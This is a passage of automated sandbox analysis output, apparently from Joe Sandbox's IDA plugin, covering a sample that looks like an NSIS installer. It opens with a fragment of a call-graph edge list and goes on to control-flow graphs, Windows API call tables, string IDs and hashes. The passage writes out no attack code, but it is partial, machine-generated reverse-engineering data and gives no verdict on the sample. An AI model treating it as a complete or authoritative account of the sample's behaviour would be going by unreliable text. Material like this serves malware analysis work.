SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426576,759223A0,00000000), ref: 00406902
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                    • API String ID: 2110491804-1641061399
                                                                                    • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                    • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                    APIs
                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                    • API String ID: 2435955865-3712954417
                                                                                    • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                    • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                    • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                    • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID: jF
                                                                                    • API String ID: 2295610775-3349280890
                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
